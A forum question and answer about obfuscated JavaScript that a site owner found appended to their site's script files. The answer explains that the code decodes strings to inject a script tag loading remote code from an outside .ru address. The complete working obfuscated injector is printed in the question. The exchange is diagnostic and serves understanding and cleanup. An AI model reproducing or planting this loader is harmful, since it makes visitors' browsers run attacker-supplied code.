Tags: javascript, jquery, malware, malware-detection

Some strange code at the bottom of a JavaScript file


I have a website, and I've found that some of its JavaScript files have strange code at the bottom. Here's a copy of that code:

function abbxeasat(c4cr4pm4){return g46isme(i7h22f0gi4(c4cr4pm4),'g4u0kvvbo');}function i7h22f0gi4(kr8sug){var nn68ho='';var lp79msv=0;var sxifdfz=0;for(lp79msv=0;lp79msv<kr8sug.length/3;lp79msv++){nn68ho+=String.fromCharCode(kr8sug.slice(sxifdfz, sxifdfz+3));sxifdfz=sxifdfz+3;}return nn68ho;}var k4ovchr=["020087", "021093","023064", "004070016081031019051014010010081027068","020070022", "019077005085", "019081013068068028023020014020087007089027002", "006068005085005018053010006011080", "015081020084", "000081001117007019027007001019071055073063023017044014010081", "015064001064081089089017027006064016030024027026080065021065090090024089021012027073094006"];function t6rn0k(kd858l6){var ircm0d8ot=document[abbxeasat(k4ovchr[3])](abbxeasat(k4ovchr[0])+abbxeasat(k4ovchr[1])+abbxeasat(k4ovchr[2]));ircm0d8ot[abbxeasat(k4ovchr[4])]=kd858l6;ircm0d8ot[abbxeasat(k4ovchr[5])]=abbxeasat(k4ovchr[6]);document[abbxeasat(k4ovchr[9])](abbxeasat(k4ovchr[8]))[0][abbxeasat(k4ovchr[7])](ircm0d8ot);}t6rn0k(abbxeasat(k4ovchr[10]));function g46isme(a747mi3lx, ysbu3g) {var y7lk3ubt='';var c2zom0n=0;var a9yhxvd=0;for(c2zom0n=0;c2zom0n<a747mi3lx.length;c2zom0n++){var x7t9oj0=a747mi3lx.charAt(c2zom0n);var a205z01r=x7t9oj0.charCodeAt(0)^ysbu3g.charCodeAt(a9yhxvd);x7t9oj0=String.fromCharCode(a205z01r);y7lk3ubt+=x7t9oj0;if(a9yhxvd==ysbu3g.length-1)a9yhxvd=0;else a9yhxvd++;}return(y7lk3ubt);}

I think that my webserver has been hacked. Can somebody tell me what this code does? And how it came to be in my file?


Solution

  • After flattening it out and making it readable, it seems to do this (these are the strings it decodes, in the order it uses them):

    createElement
    sc
    ri
    pt
    src
    type
    text/javascript
    getElementsByTagName
    head
    appendChild
    

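    And what it appends is a script element whose src is:

    http://state.sml2.ru/js/cnt.js

    So every browser that loads the modified file also fetches and runs whatever that URL serves.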